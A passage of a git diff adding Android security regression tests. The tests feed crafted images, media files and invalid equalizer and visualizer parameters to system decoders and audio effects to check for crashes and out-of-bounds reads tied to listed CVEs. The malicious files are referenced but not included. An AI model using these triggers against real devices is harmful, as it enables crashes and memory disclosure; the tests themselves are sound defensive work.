+ final int bufferSize = bufferSamples * 2; // bytes per sample for 16 bits
+ final short data[] = new short[bufferSamples]; // zero data
+
+ for (AudioEffect.Descriptor descriptor : AudioEffect.queryEffects()) {
+ if (descriptor.type.compareTo(UUID.fromString(VISUALIZER_TYPE)) != 0) {
+ continue;
+ }
+
+ AudioEffect audioEffect = null;
+ AudioTrack audioTrack = null;
+
+ try {
+ // create track and play
+ {
+ audioTrack = new AudioTrack(AudioManager.STREAM_MUSIC, sampleRate,
+ AudioFormat.CHANNEL_OUT_STEREO, format, bufferSize,
+ AudioTrack.MODE_STATIC);
+ assertEquals("Cannot write to audio track",
+ bufferSamples,
+ audioTrack.write(data, 0 /* offsetInBytes */, data.length));
+ assertEquals("AudioTrack not initialized",
+ AudioTrack.STATE_INITIALIZED,
+ audioTrack.getState());
+ assertEquals("Cannot set loop points",
+ android.media.AudioTrack.SUCCESS,
+ audioTrack.setLoopPoints(0 /* startInFrames */, bufferFrames, loops));
+ audioTrack.play();
+ }
+
+ // wait for track to really begin playing
+ Thread.sleep(200 /* millis */);
+
+ // create effect
+ {
+ audioEffect = (AudioEffect) AudioEffect.class.getConstructor(
+ UUID.class, UUID.class, int.class, int.class).newInstance(
+ descriptor.type, descriptor.uuid, 0 /* priority */,
+ audioTrack.getAudioSessionId());
+ }
+
+ // set capture size
+ {
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(4) // psize (sizeof(param))
+ .putInt(4) // vsize (sizeof(value))
+ .putInt(VISUALIZER_PARAM_CAPTURE_SIZE) // data[0] (param)
+ .putInt(CAPTURE_SIZE) // data[4] (value)
+ .array();
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_SET_PARAM,
+ command, new byte[4] /* reply */);
+ Log.d(TAG, "setparam returns " + ret);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+
+ // enable effect
+ {
+ final int ret = audioEffect.setEnabled(true);
+ assertEquals("Cannot enable audio effect", 0 /* expected */, ret);
+ }
+
+ // wait for track audio data to be processed, otherwise capture
+ // will not really return audio data.
+ Thread.sleep(200 /* millis */);
+
+ // capture data
+ {
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ VISUALIZER_CMD_CAPTURE,
+ new byte[0] /* command */, captureBuf /* reply */);
+ Log.d(TAG, "capture returns " + ret);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } finally {
+ if (audioEffect != null) {
+ audioEffect.release();
+ }
+ if (audioTrack != null) {
+ audioTrack.release();
+ }
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/BigRleTest.java b/tests/tests/security/src/android/security/cts/BigRleTest.java
new file mode 100644
index 0000000..f3c2302
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/BigRleTest.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class BigRleTest extends AndroidTestCase {
+ /**
+ * Verifies that the device does not run OOM decoding a particular RLE encoded BMP.
+ *
+ * This image reports that its encoded length is over 4 gigs. Prior to fixing issue 33251605,
+ * we attempted to allocate space for all the encoded data at once, resulting in OOM.
+ */
+ public void test_android_bug_33251605() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33251605);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/EffectBundleTest.java b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
new file mode 100644
index 0000000..c844fbb
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
@@ -0,0 +1,339 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.media.audiofx.AudioEffect;
+import android.media.audiofx.Equalizer;
+import android.media.MediaPlayer;
+import android.test.InstrumentationTestCase;
+import android.util.Log;
+
+import java.nio.ByteBuffer;
+import java.nio.ByteOrder;
+import java.nio.charset.StandardCharsets;
+import java.util.Arrays;
+
+public class EffectBundleTest extends InstrumentationTestCase {
+ private static final String TAG = "EffectBundleTest";
+ private static final int[] INVALID_BAND_ARRAY = {Integer.MIN_VALUE, -10000, -100, -2, -1};
+ private static final int mValue0 = 9999; //unlikely values. Should not change
+ private static final int mValue1 = 13877;
+ private static final int PRESET_CUSTOM = -1; //keep in sync AudioEqualizer.h
+
+ private static final int MEDIA_SHORT = 0;
+ private static final int MEDIA_LONG = 1;
+
+ //Testing security bug: 32436341
+ public void testEqualizer_getParamCenterFreq() throws Exception {
+ testGetParam(MEDIA_SHORT, Equalizer.PARAM_CENTER_FREQ, INVALID_BAND_ARRAY, mValue0,
+ mValue1);
+ }
+
+ //Testing security bug: 32588352
+ public void testEqualizer_getParamCenterFreq_long() throws Exception {
+ testGetParam(MEDIA_LONG, Equalizer.PARAM_CENTER_FREQ, INVALID_BAND_ARRAY, mValue0, mValue1);
+ }
+
+ //Testing security bug: 32438598
+ public void testEqualizer_getParamBandLevel() throws Exception {
+ testGetParam(MEDIA_SHORT, Equalizer.PARAM_BAND_LEVEL, INVALID_BAND_ARRAY, mValue0, mValue1);
+ }
+
+ //Testing security bug: 32584034
+ public void testEqualizer_getParamBandLevel_long() throws Exception {
+ testGetParam(MEDIA_LONG, Equalizer.PARAM_BAND_LEVEL, INVALID_BAND_ARRAY, mValue0, mValue1);
+ }
+
+ //Testing security bug: 32247948
+ public void testEqualizer_getParamFreqRange() throws Exception {
+ testGetParam(MEDIA_SHORT, Equalizer.PARAM_BAND_FREQ_RANGE, INVALID_BAND_ARRAY, mValue0,
+ mValue1);
+ }
+
+ //Testing security bug: 32588756
+ public void testEqualizer_getParamFreqRange_long() throws Exception {
+ testGetParam(MEDIA_LONG, Equalizer.PARAM_BAND_FREQ_RANGE, INVALID_BAND_ARRAY, mValue0,
+ mValue1);
+ }
+
+ //Testing security bug: 32448258
+ public void testEqualizer_getParamPresetName() throws Exception {
+ testParamPresetName(MEDIA_SHORT);
+ }
+
+ //Testing security bug: 32588016
+ public void testEqualizer_getParamPresetName_long() throws Exception {
+ testParamPresetName(MEDIA_LONG);
+ }
+
+ private void testParamPresetName(int media) {
+ final int command = Equalizer.PARAM_GET_PRESET_NAME;
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ final byte testValue = 7;
+ byte reply[] = new byte[Equalizer.PARAM_STRING_SIZE_MAX];
+ Arrays.fill(reply, testValue);
+ if (!eqGetParam(media, command, invalidBand, reply)) {
+ fail("getParam PARAM_GET_PRESET_NAME did not complete successfully");
+ }
+ //Compare
+ if (invalidBand == PRESET_CUSTOM) {
+ final String expectedName = "Custom";
+ int length = 0;
+ while (reply[length] != 0) length++;
+ try {
+ final String presetName = new String(reply, 0, length,
+ StandardCharsets.ISO_8859_1.name());
+ assertEquals("getPresetName custom preset name failed", expectedName,
+ presetName);
+ } catch (Exception e) {
+ Log.w(TAG,"Problem creating reply string.");
+ }
+ } else {
+ for (int i = 0; i < reply.length; i++) {
+ assertEquals(String.format("getParam should not change reply at byte %d", i),
+ testValue, reply[i]);
+ }
+ }
+ }
+ }
+
+ //testing security bug: 32095626
+ public void testEqualizer_setParamBandLevel() throws Exception {
+ final int command = Equalizer.PARAM_BAND_LEVEL;
+ short[] value = { 1000 };
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ if (!eqSetParam(MEDIA_SHORT, command, invalidBand, value)) {
+ fail("setParam PARAM_BAND_LEVEL did not complete successfully");
+ }
+ }
+ }
+
+ //testing security bug: 32585400
+ public void testEqualizer_setParamBandLevel_long() throws Exception {
+ final int command = Equalizer.PARAM_BAND_LEVEL;
+ short[] value = { 1000 };
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ if (!eqSetParam(MEDIA_LONG, command, invalidBand, value)) {
+ fail("setParam PARAM_BAND_LEVEL did not complete successfully");
+ }
+ }
+ }
+
+ //testing security bug: 32705438
+ public void testEqualizer_getParamFreqRangeCommand_short() throws Exception {
+ assertTrue("testEqualizer_getParamFreqRangeCommand_short did not complete successfully",
+ eqGetParamFreqRangeCommand(MEDIA_SHORT));
+ }
+
+ //testing security bug: 32703959
+ public void testEqualizer_getParamFreqRangeCommand_long() throws Exception {
+ assertTrue("testEqualizer_getParamFreqRangeCommand_long did not complete successfully",
+ eqGetParamFreqRangeCommand(MEDIA_LONG));
+ }
+
+ private boolean eqGetParamFreqRangeCommand(int media) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ short band = 2;
+ int intSize = 4; //bytes
+
+ //baseline
+ int cmdCode = 8; // EFFECT_CMD_GET_PARAM
+ byte command[] = concatArrays(/*status*/ intToByteArray(0),
+ /*psize*/ intToByteArray(2 * intSize),
+ /*vsize*/ intToByteArray(2 * intSize),
+ /*data[0]*/ intToByteArray(Equalizer.PARAM_BAND_FREQ_RANGE),
+ /*data[1]*/ intToByteArray((int) band));
+
+ byte reply[] = new byte[command.length];
+
+ AudioEffect af = eq;
+ Object o = AudioEffect.class.getDeclaredMethod("command", int.class, byte[].class,
+ byte[].class).invoke(af, cmdCode, command, reply);
+
+ int methodStatus = AudioEffect.ERROR;
+ if (o != null) {
+ methodStatus = Integer.valueOf(o.toString()).intValue();
+ }
+
+ assertTrue("Command expected to fail", methodStatus <= 0);
+ int sum = 0;
+ for (int i = 0; i < reply.length; i++) {
+ sum += Math.abs(reply[i]);
+ }
+
+ assertEquals("reply expected to be all zeros", sum, 0);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem testing eqGetParamFreqRangeCommand");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private boolean eqGetParam(int media, int command, int band, byte[] reply) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ AudioEffect af = eq;
+ int cmd[] = {command, band};
+
+ AudioEffect.class.getDeclaredMethod("getParameter", int[].class,
+ byte[].class).invoke(af, cmd, reply);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem testing equalizer");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private boolean eqGetParam(int media, int command, int band, int[] reply) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ AudioEffect af = eq;
+ int cmd[] = {command, band};
+
+ AudioEffect.class.getDeclaredMethod("getParameter", int[].class,
+ int[].class).invoke(af, cmd, reply);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem getting parameter from equalizer");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private void testGetParam(int media, int command, int[] bandArray, int value0, int value1) {
+ int reply[] = {value0, value1};
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ if (!eqGetParam(media, command, invalidBand, reply)) {
+ fail(String.format("getParam for command %d did not complete successfully",
+ command));
+ }
+ assertEquals("getParam should not change value0", value0, reply[0]);
+ assertEquals("getParam should not change value1", value1, reply[1]);
+ }
+ }
+
+ private boolean eqSetParam(int media, int command, int band, short[] value) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ AudioEffect af = eq;
+ int cmd[] = {command, band};
+
+ AudioEffect.class.getDeclaredMethod("setParameter", int[].class,
+ short[].class).invoke(af, cmd, value);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem setting parameter in equalizer");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private int getMediaId(int media) {
+ switch (media) {
+ default:
+ case MEDIA_SHORT:
+ return R.raw.good;
+ case MEDIA_LONG:
+ return R.raw.onekhzsine_90sec;
+ }
+ }
+
+ private static byte[] intToByteArray(int value) {
+ ByteBuffer converter = ByteBuffer.allocate(4);
+ converter.order(ByteOrder.nativeOrder());
+ converter.putInt(value);
+ return converter.array();
+ }
+
+ private static byte[] shortToByteArray(short value) {
+ ByteBuffer converter = ByteBuffer.allocate(2);
+ converter.order(ByteOrder.nativeOrder());
+ short sValue = (short) value;
+ converter.putShort(sValue);
+ return converter.array();
+ }
+
+ private static byte[] concatArrays(byte[]... arrays) {
+ int len = 0;
+ for (byte[] a : arrays) {
+ len += a.length;
+ }
+ byte[] b = new byte[len];
+
+ int offs = 0;
+ for (byte[] a : arrays) {
+ System.arraycopy(a, 0, b, offs, a.length);
+ offs += a.length;
+ }
+ return b;
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/Movie33897722.java b/tests/tests/security/src/android/security/cts/Movie33897722.java
new file mode 100644
index 0000000..f6859da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/Movie33897722.java
@@ -0,0 +1,65 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.Movie;
+import android.graphics.Paint;
+import android.graphics.PorterDuff;
+import android.graphics.PorterDuffXfermode;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class Movie33897722 extends AndroidTestCase {
+ /**
+ * Verifies that decoding a particular GIF file does not read out out of bounds.
+ *
+ * The image has a color map of size 2, but states that pixels should come from values
+ * larger than 2. Ensure that we do not attempt to read colors from beyond the end of the
+ * color map, which would be reading memory that we do not control, and may be uninitialized.
+ */
+ public void test_android_bug_33897722() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33897722);
+ Movie movie = Movie.decodeStream(exploitImage);
+ assertNotNull(movie);
+ assertEquals(movie.width(), 600);
+ assertEquals(movie.height(), 752);
+
+ // The image has a 10 x 10 frame on top of a transparent background. Only test the
+ // 10 x 10 frame, since the original bug would never have used uninitialized memory
+ // outside of it.
+ Bitmap bitmap = Bitmap.createBitmap(10, 10, Bitmap.Config.ARGB_8888);
+ Canvas canvas = new Canvas(bitmap);
+
+ // Use Src PorterDuff mode, to see exactly what the Movie creates.
+ Paint paint = new Paint();
+ paint.setXfermode(new PorterDuffXfermode(PorterDuff.Mode.SRC));
+
+ movie.draw(canvas, 0, 0, paint);
+
+ for (int x = 0; x < 10; x++) {
+ for (int y = 0; y < 10; y++) {
+ assertEquals(bitmap.getPixel(x, y), Color.TRANSPARENT);
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/NativeCodeTest.java b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
index 5fa698e..eb162fb 100644
--- a/tests/tests/security/src/android/security/cts/NativeCodeTest.java
+++ b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
@@ -16,6 +16,8 @@
package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+
import junit.framework.TestCase;
public class NativeCodeTest extends TestCase {
@@ -24,6 +26,7 @@
System.loadLibrary("ctssecurity_jni");
}
+ @SecurityTest
public void testVroot() throws Exception {
assertTrue("Device is vulnerable to CVE-2013-6282. Please apply security patch at "
+ "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -31,6 +34,7 @@
+ "8404663f81d212918ff85f493649a7991209fa04", doVrootTest());
}
+ @SecurityTest
public void testPerfEvent() throws Exception {
assertFalse("Device is vulnerable to CVE-2013-2094. Please apply security patch "
+ "at http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -38,10 +42,12 @@
doPerfEventTest());
}
+ @SecurityTest
public void testPerfEvent2() throws Exception {
assertTrue(doPerfEventTest2());
}
+ @SecurityTest
public void testFutex() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-3153, a vulnerability in the futex() system "
+ "call. Please apply the security patch at "
@@ -50,6 +56,7 @@
doFutexTest());
}
+ @SecurityTest
public void testNvmapIocFromId() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-5332. "
+ "NVIDIA has released code fixes to upstream repositories and device vendors. "
@@ -58,6 +65,7 @@
doNvmapIocFromIdTest());
}
+ @SecurityTest
public void testPingPongRoot() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-3636, a vulnerability in the ping "
+ "socket implementation. Please apply the security patch at "
@@ -65,6 +73,7 @@
doPingPongRootTest());
}
+ @SecurityTest
public void testPipeReadV() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-1805 and/or CVE-2016-0774,"
+ " a vulnerability in the pipe_read() function."
@@ -74,6 +83,7 @@
doPipeReadVTest());
}
+ @SecurityTest
public void testSysVipc() throws Exception {
assertTrue("Android does not support Sys V IPC, it must "
+ "be removed from the kernel. In the kernel config: "
@@ -114,6 +124,7 @@
*/
private static native boolean doVrootTest();
+ @SecurityTest
public void testCVE20141710() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-1710", doCVE20141710Test());
}
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 8f4b5d9..53c0e0a 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -33,16 +33,19 @@
import android.media.MediaCodecList;
import android.media.MediaExtractor;
import android.media.MediaFormat;
+import android.media.MediaMetadataRetriever;
import android.media.MediaPlayer;
import android.opengl.GLES20;
import android.opengl.GLES11Ext;
import android.os.Looper;
import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
import android.test.InstrumentationTestCase;
import android.util.Log;
import android.view.Surface;
import java.io.IOException;
+import java.nio.ByteBuffer;
import java.util.ArrayList;
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.ReentrantLock;
@@ -62,114 +65,197 @@
public StagefrightTest() {
}
+ /***********************************************************
+ to prevent merge conflicts, add K tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_33137046() throws Exception {
+ doStagefrightTest(R.raw.bug_33137046);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2016_2507() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2507);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_31647370() throws Exception {
+ doStagefrightTest(R.raw.bug_31647370);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_32577290() throws Exception {
+ doStagefrightTest(R.raw.bug_32577290);
+ }
+
+ @SecurityTest
public void testStagefright_cve_2015_1538_1() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_1);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_2() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_2);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_3() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_3);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_4() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_4);
}
+ @SecurityTest
public void testStagefright_cve_2015_1539() throws Exception {
doStagefrightTest(R.raw.cve_2015_1539);
}
+ @SecurityTest
public void testStagefright_cve_2015_3824() throws Exception {
doStagefrightTest(R.raw.cve_2015_3824);
}
+ @SecurityTest
public void testStagefright_cve_2015_3826() throws Exception {
doStagefrightTest(R.raw.cve_2015_3826);
}
+ @SecurityTest
public void testStagefright_cve_2015_3827() throws Exception {
doStagefrightTest(R.raw.cve_2015_3827);
}
+ @SecurityTest
public void testStagefright_cve_2015_3828() throws Exception {
doStagefrightTest(R.raw.cve_2015_3828);
}
+ @SecurityTest
public void testStagefright_cve_2015_3829() throws Exception {
doStagefrightTest(R.raw.cve_2015_3829);
}
+ @SecurityTest
public void testStagefright_cve_2015_3864() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864);
}
+ @SecurityTest
public void testStagefright_cve_2015_6598() throws Exception {
doStagefrightTest(R.raw.cve_2015_6598);
}
+ @SecurityTest
public void testStagefright_bug_26366256() throws Exception {
doStagefrightTest(R.raw.bug_26366256);
}
+ @SecurityTest
+ public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
+ }
+
+ /***********************************************************
+ to prevent merge conflicts, add M tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_33818508() throws Exception {
+ doStagefrightTest(R.raw.bug_33818508);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_32873375() throws Exception {
+ doStagefrightTest(R.raw.bug_32873375);
+ }
+
+ @SecurityTest
public void testStagefright_bug_25765591() throws Exception {
doStagefrightTest(R.raw.bug_25765591);
}
+ @SecurityTest
public void testStagefright_bug_25812590() throws Exception {
doStagefrightTest(R.raw.bug_25812590);
}
+ @SecurityTest
public void testStagefright_bug_26070014() throws Exception {
doStagefrightTest(R.raw.bug_26070014);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867);
}
+ @SecurityTest
public void testStagefright_cve_2015_3869() throws Exception {
doStagefrightTest(R.raw.cve_2015_3869);
}
+ @SecurityTest
+ public void testStagefright_bug_32322258() throws Exception {
+ doStagefrightTest(R.raw.bug_32322258);
+ }
+
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_23248776() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_23248776);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_20718524() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_20718524);
}
+ @SecurityTest
public void testStagefright_cve_2015_3862_b_22954006() throws Exception {
doStagefrightTest(R.raw.cve_2015_3862_b_22954006);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867_b_23213430() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867_b_23213430);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_21814993() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_21814993);
}
+ @SecurityTest
+ public void testStagefright_bug_32915871() throws Exception {
+ doStagefrightTest(R.raw.bug_32915871);
+ }
+
+ @SecurityTest
public void testStagefright_bug_28333006() throws Exception {
doStagefrightTest(R.raw.bug_28333006);
}
+ @SecurityTest
public void testStagefright_bug_14388161() throws Exception {
doStagefrightTestMediaPlayer(R.raw.bug_14388161);
}
+ @SecurityTest
public void testStagefright_cve_2016_3755() throws Exception {
doStagefrightTest(R.raw.cve_2016_3755);
}
+ @SecurityTest
public void testStagefright_cve_2016_3878_b_29493002() throws Exception {
doStagefrightTest(R.raw.cve_2016_3878_b_29493002);
}
+ @SecurityTest
public void testStagefright_bug_27855419_CVE_2016_2463() throws Exception {
doStagefrightTest(R.raw.bug_27855419);
}
@@ -177,6 +263,7 @@
private void doStagefrightTest(final int rid) throws Exception {
doStagefrightTestMediaPlayer(rid);
doStagefrightTestMediaCodec(rid);
+ doStagefrightTestMediaMetadataRetriever(rid);
}
private Surface getDummySurface() {
@@ -282,7 +369,6 @@
final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
-
LooperThread t = new LooperThread(new Runnable() {
@Override
public void run() {
@@ -363,7 +449,6 @@
} catch (IOException e) {
// ignore
}
- MediaCodecList codecList = new MediaCodecList(MediaCodecList.REGULAR_CODECS);
int numtracks = ex.getTrackCount();
String rname = resources.getResourceEntryName(rid);
Log.i(TAG, "start mediacodec test for: " + rname + ", which has " + numtracks + " tracks");
@@ -378,13 +463,15 @@
continue;
}
String mime = format.getString(MediaFormat.KEY_MIME);
- for (MediaCodecInfo info: codecList.getCodecInfos()) {
+ int numCodecs = MediaCodecList.getCodecCount();
+ for (int i = 0; i < numCodecs; i++) {
+ MediaCodecInfo info = MediaCodecList.getCodecInfoAt(i);
if (info.isEncoder()) {
continue;
}
try {
MediaCodecInfo.CodecCapabilities caps = info.getCapabilitiesForType(mime);
- if (caps != null && caps.isFormatSupported(format)) {
+ if (caps != null) {
matchingCodecs.add(info.getName());
}
} catch (IllegalArgumentException e) {
@@ -405,16 +492,21 @@
if (mime.startsWith("video/")) {
surface = getDummySurface();
}
- codec.configure(format, surface, null, 0);
- codec.start();
+ try {
+ codec.configure(format, surface, null, 0);
+ codec.start();
+ } catch (Exception e) {
+ Log.i(TAG, "Failed to start/configure:", e);
+ }
MediaCodec.BufferInfo info = new MediaCodec.BufferInfo();
try {
+ ByteBuffer [] inputBuffers = codec.getInputBuffers();
while (true) {
int flags = ex.getSampleFlags();
long time = ex.getSampleTime();
int bufidx = codec.dequeueInputBuffer(5000);
if (bufidx >= 0) {
- int n = ex.readSampleData(codec.getInputBuffer(bufidx), 0);
+ int n = ex.readSampleData(inputBuffers[bufidx], 0);
if (n < 0) {
flags = MediaCodec.BUFFER_FLAG_END_OF_STREAM;
time = 0;
@@ -435,14 +527,8 @@
codec.releaseOutputBuffer(status, true);
}
}
- } catch (MediaCodec.CodecException ce) {
- if (ce.getErrorCode() == MediaCodec.CodecException.ERROR_RECLAIMED) {
- // This indicates that the remote service is dead, suggesting a crash.
- throw new RuntimeException(ce);
- }
- // Other errors ignored.
- } catch (IllegalStateException ise) {
- // Other errors ignored.
+ } catch (Exception e) {
+ // local exceptions ignored, not security issues
} finally {
codec.release();
}
@@ -453,6 +539,62 @@
assertFalse("Device *IS* vulnerable to " + cve,
mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
thr.stopLooper();
+ thr.join();
+ }
+ private void doStagefrightTestMediaMetadataRetriever(final int rid) throws Exception {
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+
+ LooperThread thr = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ try {
+ AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(R.raw.good);
+
+ // the onErrorListener won't receive MEDIA_ERROR_SERVER_DIED until
+ // setDataSource has been called
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ } catch (Exception e) {
+ // this is a known-good file, so no failure should occur
+ fail("setDataSource of known-good file failed");
+ }
+
+ synchronized(mpcl) {
+ mpcl.notify();
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ thr.start();
+ // wait until the thread has initialized the MediaPlayer
+ synchronized(mpcl) {
+ mpcl.wait();
+ }
+
+ Resources resources = getInstrumentation().getContext().getResources();
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ MediaMetadataRetriever retriever = new MediaMetadataRetriever();
+ try {
+ retriever.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IllegalArgumentException e) {
+ // ignore
+ }
+ retriever.extractMetadata(MediaMetadataRetriever.METADATA_KEY_DURATION);
+ retriever.getEmbeddedPicture();
+ retriever.getFrameAtTime();
+
+ retriever.release();
+ String rname = resources.getResourceEntryName(rid);
+ String cve = rname.replace("_", "-").toUpperCase();
+ assertFalse("Device *IS* vulnerable to " + cve,
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ thr.stopLooper();
}
}
diff --git a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
new file mode 100644
index 0000000..807412b
--- /dev/null
